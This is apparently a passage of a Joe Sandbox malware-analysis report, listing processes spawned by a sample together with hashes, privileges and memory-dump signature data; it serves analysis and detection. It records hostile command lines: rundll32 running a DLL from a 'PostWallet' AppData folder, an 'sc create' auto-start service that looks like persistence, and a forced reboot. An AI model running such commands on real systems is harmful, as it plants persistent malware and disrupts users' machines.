                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:10
                                        Start time:10:36:04
                                        Start date:07/03/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:11
                                        Start time:10:36:04
                                        Start date:07/03/2024
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
                                        Imagebase:0xc60000
                                        File size:61'440 bytes
                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:12
                                        Start time:10:36:05
                                        Start date:07/03/2024
                                        Path:C:\Windows\System32\rundll32.exe
                                        Wow64 process (32bit):false
                                        Commandline:rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
                                        Imagebase:0x7ff73bda0000
                                        File size:71'680 bytes
                                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Reputation:high
                                        Has exited:false

                                        Target ID:15
                                        Start time:10:36:16
                                        Start date:07/03/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\cmd.exe" /C sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
                                        Imagebase:0x7ff619640000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:16
                                        Start time:10:36:16
                                        Start date:07/03/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:17
                                        Start time:10:36:16
                                        Start date:07/03/2024
                                        Path:C:\Windows\System32\shutdown.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
                                        Imagebase:0x7ff6fbe80000
                                        File size:28'160 bytes
                                        MD5 hash:F2A4E18DA72BB2C5B21076A5DE382A20
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:18
                                        Start time:10:36:16
                                        Start date:07/03/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
                                        Imagebase:0x7ff74b790000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:19
                                        Start time:10:36:17
                                        Start date:07/03/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:21
                                        Start time:10:36:25
                                        Start date:07/03/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true


                                          Execution Graph

                                          Execution Coverage:11%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:6.4%
                                          Total number of Nodes:78
                                          Total number of Limit Nodes:2

                                          Callgraph

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 10 619cd1-619cd6 11 619c8e-619c96 call 61a090 10->11 13 619c9b-619c9c 11->13 13->10
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00619C96
                                            • Part of subcall function 0061A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0061A09B
                                            • Part of subcall function 0061A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0061A103
                                            • Part of subcall function 0061A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0061A114
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1627785191.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                          • Associated: 00000000.00000002.1627722929.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1627820635.000000000062F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1627845730.000000000063A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1627871097.000000000063C000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_610000_00023948209303294#U00ac320302282349843984903.jbxd
                                          Similarity
                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                          • String ID:
                                          • API String ID: 697777088-0
                                          • Opcode ID: 68a135996024c522ad13601e332b6c03b7ea60be0855c8810f6ef106f45fb115
                                          • Instruction ID: 27b9e18664b1459668466885012544582a657e9570b51e17757a9b7d10ede232
                                          • Opcode Fuzzy Hash: 68a135996024c522ad13601e332b6c03b7ea60be0855c8810f6ef106f45fb115
                                          • Instruction Fuzzy Hash: 7EB012E135D2006E3158E5955F02DF6024FD1C4B21734442EF044C6040D8401CC220B7
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 619cb3-619cb8 1 619c8e-619c96 call 61a090 0->1 3 619c9b-619cd6 1->3 3->1
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00619C96
                                            • Part of subcall function 0061A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0061A09B
                                            • Part of subcall function 0061A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0061A103
                                            • Part of subcall function 0061A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0061A114
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1627785191.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                          • Associated: 00000000.00000002.1627722929.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1627820635.000000000062F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1627845730.000000000063A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1627871097.000000000063C000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_610000_00023948209303294#U00ac320302282349843984903.jbxd
                                          Similarity
                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                          • String ID:
                                          • API String ID: 697777088-0
                                          • Opcode ID: 7b0784853b4aaf0902ab3269bf40bd00cd8000ba2ea57af9748f4851a96eac73
                                          • Instruction ID: 8b5547f2a204412f90c5dca6d0d8a0e6a5f8a53b728f04ec7b6c9c81336d7b7e
                                          • Opcode Fuzzy Hash: 7b0784853b4aaf0902ab3269bf40bd00cd8000ba2ea57af9748f4851a96eac73
                                          • Instruction Fuzzy Hash: CFB012E125D2006E3548E9A51D06DB6028FC2C4B217349C2EF444C6040D8401C8120B7
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 14 619cdb-619ce0 15 619c8e-619c96 call 61a090 14->15 17 619c9b-619cd6 15->17 17->15
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00619C96
                                            • Part of subcall function 0061A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0061A09B
                                            • Part of subcall function 0061A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0061A103
                                            • Part of subcall function 0061A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0061A114
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1627785191.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                          • Associated: 00000000.00000002.1627722929.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1627820635.000000000062F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1627845730.000000000063A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1627871097.000000000063C000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_610000_00023948209303294#U00ac320302282349843984903.jbxd
                                          Similarity
                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                          • String ID:
                                          • API String ID: 697777088-0
                                          • Opcode ID: d4eddec529b86579db240a62e4e075327b7ff53e783bd3c00a1c5542ae2eef26
                                          • Instruction ID: 59cdfa54097ed9e8f8fc9807af8e79f3b6f4edd0dd93af7db560570340f8e4cd
                                          • Opcode Fuzzy Hash: d4eddec529b86579db240a62e4e075327b7ff53e783bd3c00a1c5542ae2eef26
                                          • Instruction Fuzzy Hash: 69B012E135D2006E3158E5961D02DB6024FD1C4B21734482EF044C6080D8401CC120B7
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5 619cbd-619cc2 6 619c8e-619c96 call 61a090 5->6 8 619c9b-619cd6 6->8 8->6
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00619C96
                                            • Part of subcall function 0061A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0061A09B
                                            • Part of subcall function 0061A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0061A103
                                            • Part of subcall function 0061A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0061A114
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1627785191.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                          • Associated: 00000000.00000002.1627722929.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1627820635.000000000062F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1627845730.000000000063A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1627871097.000000000063C000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_610000_00023948209303294#U00ac320302282349843984903.jbxd
                                          Similarity
                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                          • String ID:
                                          • API String ID: 697777088-0
                                          • Opcode ID: 44cdff5774529d7dd44ae710a520472404132d5af9ed8141aa3a4096d595b7f6
                                          • Instruction ID: d8b266179756d9d17cabfc14195bffc9f82489cbb6d400eb4cd3fe13c3bb6350
                                          • Opcode Fuzzy Hash: 44cdff5774529d7dd44ae710a520472404132d5af9ed8141aa3a4096d595b7f6
                                          • Instruction Fuzzy Hash: 80B012E225D2006E3548E9951D02DB6028FD1C4B21734582FF044C6040D8401C8120B7
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: rS_H$wS_H
                                          • API String ID: 0-1007948726
                                          • Opcode ID: e435df7329ad9d6fa337288efd1641b7ce566c4ef7209c6202f45adbdf9f32be
                                          • Instruction ID: 2ff9ce7d545e59f59036d7b6038c7011e464e8e1524bbfa0a903be3759459e36
                                          • Opcode Fuzzy Hash: e435df7329ad9d6fa337288efd1641b7ce566c4ef7209c6202f45adbdf9f32be
                                          • Instruction Fuzzy Hash: A6424B31B1D90E0FE7789BAC986167973D1EF98350F15027AD45EC32E6ED29AC438391
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 3M_^$4M_^
                                          • API String ID: 0-579734165
                                          • Opcode ID: 7ea32ae816dea5259fcc26e5b009641c7f67ef981213b9c9459be5346d22ddaa
                                          • Instruction ID: c9e6395327653413e8724eae833e225d81a3e705d1ff2c5065d55d5b5a7b0ee9
                                          • Opcode Fuzzy Hash: 7ea32ae816dea5259fcc26e5b009641c7f67ef981213b9c9459be5346d22ddaa
                                          • Instruction Fuzzy Hash: 72C1DA63B0A1B64AD71AB7BCBCB68E97790DF0222C70942F7D0DD8B0D7ED0864478294
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7a3208ce75ef984d075bf225e20da8b59bc194d9ba72ee7f56af23b130d2074d
                                          • Instruction ID: 14059e9a1cee5d007efc240fbdf0e2aee292959a079097c7bbb2bad37e766463
                                          • Opcode Fuzzy Hash: 7a3208ce75ef984d075bf225e20da8b59bc194d9ba72ee7f56af23b130d2074d
                                          • Instruction Fuzzy Hash: C482B2B0A19B0A8FD768EF18C492575B7E1FB58314B14456EC0CBC7AA6DB35F8438B81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1a3fe052f37e5f529a9b8f06a7bec2a1266d113850c9da3f9f638651c7fcfedb
                                          • Instruction ID: be28d141828d10de9c193e20c3518faa3df6785e6abec0b86d049e029e717c47
                                          • Opcode Fuzzy Hash: 1a3fe052f37e5f529a9b8f06a7bec2a1266d113850c9da3f9f638651c7fcfedb
                                          • Instruction Fuzzy Hash: 28223831B1D94A4FE798EB6C9465A7D73D2EF98310F4501BAE40DC32E6DE28ED428351
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: L_^$L_^$L_^
                                          • API String ID: 0-111135195
                                          • Opcode ID: 05cbc9931f1e6a149a543a08874c82b0689dbde8a10697a56ebc09481fa729ef
                                          • Instruction ID: e5ae7c428a5cd4581218aa3d41112c8b129c9e7cc9e990c78f31683a407d0188
                                          • Opcode Fuzzy Hash: 05cbc9931f1e6a149a543a08874c82b0689dbde8a10697a56ebc09481fa729ef
                                          • Instruction Fuzzy Hash: 3BC18B72B0E94E4FD799EB6CA8A55F97791FF88308B4801BAD05DC71D7ED24A8038351
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PK00$ZK_H
                                          • API String ID: 0-3853493638
                                          • Opcode ID: 0ac67ec3f8eab8fff54cd8915c4dfd870d2cf1558bd31dfa874e17ccb01fed85
                                          • Instruction ID: ef0970f7652d7112ec8280f0b022b872fca07ade2aabfcd9c8b8650e9adce513
                                          • Opcode Fuzzy Hash: 0ac67ec3f8eab8fff54cd8915c4dfd870d2cf1558bd31dfa874e17ccb01fed85
                                          • Instruction Fuzzy Hash: 2FB1F661B1D9294FE7B8D76CE46867973C1EF5C310F0641BAE04EC32A6DD24AD418BC1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: VUUU
                                          • API String ID: 0-2040033107
                                          • Opcode ID: 941a67ea2a91e3ecc0159f8e02c4ff72a6e4f7a30f8dae8ce20550f295e49094
                                          • Instruction ID: 4043d6ed6a684b0dbfac0ace30dc774127d54da1142688c82c40db2e71f90639
                                          • Opcode Fuzzy Hash: 941a67ea2a91e3ecc0159f8e02c4ff72a6e4f7a30f8dae8ce20550f295e49094
                                          • Instruction Fuzzy Hash: 67B203B0A2C7498BD72DDF18C4925B9B7E1FB99300F15463EC8DB83656DA34B8538B81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: L_H
                                          • API String ID: 0-402390507
                                          • Opcode ID: 8079637c2faf011503a643d49d889738ded4b0d85219aac273d3e56c16ac245c
                                          • Instruction ID: cc7f6a822b8526ef8aca0e7609eab84cf23792d0d5151471de305b7ecc8551ed
                                          • Opcode Fuzzy Hash: 8079637c2faf011503a643d49d889738ded4b0d85219aac273d3e56c16ac245c
                                          • Instruction Fuzzy Hash: 8FD19D3170DA098FD7A8EB2CD4A996577E2FF9931071501BEE04EC72A6DE25EC82C741
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0K_H
                                          • API String ID: 0-3901017509
                                          • Opcode ID: 361daa2c985e84b18ac7a3dfb02deaafe35c2b4534e49183ecf21c8f18f59f58
                                          • Instruction ID: 4448c84b1e53c4d8405addc2baf599195932ac4d18e29a538e1b752d919e354b
                                          • Opcode Fuzzy Hash: 361daa2c985e84b18ac7a3dfb02deaafe35c2b4534e49183ecf21c8f18f59f58
                                          • Instruction Fuzzy Hash: 16C1E431B1DA5E0FEBACEB2C94656B573D1EF99310B0501BAD44EC32E7ED25AD428780
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: p
                                          • API String ID: 0-2181537457
                                          • Opcode ID: 40e24d12611973fb1ebee029ba148c780cec95f1d6d3b2f5ab8da33ea4ac93fe
                                          • Instruction ID: 02f1c167b5c83308710b778f827754b57a720f7de01773d79eaf41f644ba2734
                                          • Opcode Fuzzy Hash: 40e24d12611973fb1ebee029ba148c780cec95f1d6d3b2f5ab8da33ea4ac93fe
                                          • Instruction Fuzzy Hash: 57B16A32B0EA9E1FE769A77C68655F97B90EF5931470502FBD05DC71E7EC28A8028380
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TR_H
                                          • API String ID: 0-1329018126
                                          • Opcode ID: 947dcad92d1b2698f3e6032a3cd6d31f7eedb8bc21a5a8f061e03dd2d7bbec44
                                          • Instruction ID: 6150accaf7256f6bfd5475a05e041a097e97d2cfae8c2730e02d3b5a9c6487ff
                                          • Opcode Fuzzy Hash: 947dcad92d1b2698f3e6032a3cd6d31f7eedb8bc21a5a8f061e03dd2d7bbec44
                                          • Instruction Fuzzy Hash: B091E662B1EE5D0FEBA5A76C54661B827D2EFDC75070902BEE04DC32E7ED186D024781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: L_^p
                                          • API String ID: 0-3814412530
                                          • Opcode ID: 9252fb246942cdfc52f9683c89ae4f307d54f1bb4eeb90d4ca46c507170aca01
                                          • Instruction ID: dedda7e25574e4770519f21a13171aa64315cf1f0a7b6d676077a80bf29befda
                                          • Opcode Fuzzy Hash: 9252fb246942cdfc52f9683c89ae4f307d54f1bb4eeb90d4ca46c507170aca01
                                          • Instruction Fuzzy Hash: 82914B31B1E6894FDB69DB6848225B87FE0EF99300B1503FFD099C7193DA28D9078792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: L_H
                                          • API String ID: 0-402390507
                                          • Opcode ID: 9cae92e79b697429b38fca79cb54bbb71e1ada5f39c1d74fc8e2f7e91dda3610
                                          • Instruction ID: 5709f55e856adfe8955e39a8016b7d434d2ba52f7d7092fc0073974f3c5bcf7e
                                          • Opcode Fuzzy Hash: 9cae92e79b697429b38fca79cb54bbb71e1ada5f39c1d74fc8e2f7e91dda3610
                                          • Instruction Fuzzy Hash: F3510521B0EE4A5FE7A5DB68846566577E2EF99310B1901BEC04DC72E2DE28BD428390
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: cCK_^
                                          • API String ID: 0-3585569345
                                          • Opcode ID: dd5766117790bc659debc6b5cc48b86c26bcc10bcd7a82399bfad8603029c71d
                                          • Instruction ID: 7a9310fa9546e87742c445432a0dcf2b3c2a9c988ea7013ff7d91b20fcef166c
                                          • Opcode Fuzzy Hash: dd5766117790bc659debc6b5cc48b86c26bcc10bcd7a82399bfad8603029c71d
                                          • Instruction Fuzzy Hash: DF416DB271EA4D0FE7A8AB6CA8755B477D0EF99750F0601FBD009C71E2ED196D428381
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: YL_H
                                          • API String ID: 0-2883937193
                                          • Opcode ID: 74226f1d230a8ceafede2da5509e29ca2e4adc3d7f6a8ef28e2b33a41b9c984f
                                          • Instruction ID: c5d92613461b14a41856f6df499b6c865c457139e1a3acdc4da42ee90138ae45
                                          • Opcode Fuzzy Hash: 74226f1d230a8ceafede2da5509e29ca2e4adc3d7f6a8ef28e2b33a41b9c984f
                                          • Instruction Fuzzy Hash: D3117A63B0AC4E0BD7A8926D7C596E573D0EF9C260B0405BBE41DC3099ED256C828780
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: cK_^
                                          • API String ID: 0-313613140
                                          • Opcode ID: ded1aba1b671354ed2f2dd424e11c44df6197953ce33fb5a380ab915bf431d64
                                          • Instruction ID: b9628db2167473ec702bbf539a127266b10d05cba3a81547fa95b97660366a16
                                          • Opcode Fuzzy Hash: ded1aba1b671354ed2f2dd424e11c44df6197953ce33fb5a380ab915bf431d64
                                          • Instruction Fuzzy Hash: 5EC0805374EC5D15E590579C7C554E9F381E7D83A1F824377F04AC1155DC0C794706C1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: +`L_^
                                          • API String ID: 0-184317852
                                          • Opcode ID: 263aa57eb6dfa1fe82eb17709a6262991fd9dd2f114cdf0ae8df5887b2d23917
                                          • Instruction ID: e34d3ea97fa77c31d8aaadf705d42a1774dbf73f30e66c80287508abc51c11d1
                                          • Opcode Fuzzy Hash: 263aa57eb6dfa1fe82eb17709a6262991fd9dd2f114cdf0ae8df5887b2d23917
                                          • Instruction Fuzzy Hash: ADC0123255DE4D46C741A794E861CDAB754EF90254F801E3AF04B910A9DD5866858682
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ef64db938cd9c820b758340dc7265b31904289cb3a493383b1985404eae8bfcb
                                          • Instruction ID: d2841e2ff184a30f9b451adb9c2e8b1970005a19132c03c69e53610344711b66
                                          • Opcode Fuzzy Hash: ef64db938cd9c820b758340dc7265b31904289cb3a493383b1985404eae8bfcb
                                          • Instruction Fuzzy Hash: 8B62A131B19A4E4FDB98EF58C8A4AB973E2FF98300F1445A9D41DC32E6DE34A942C740
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
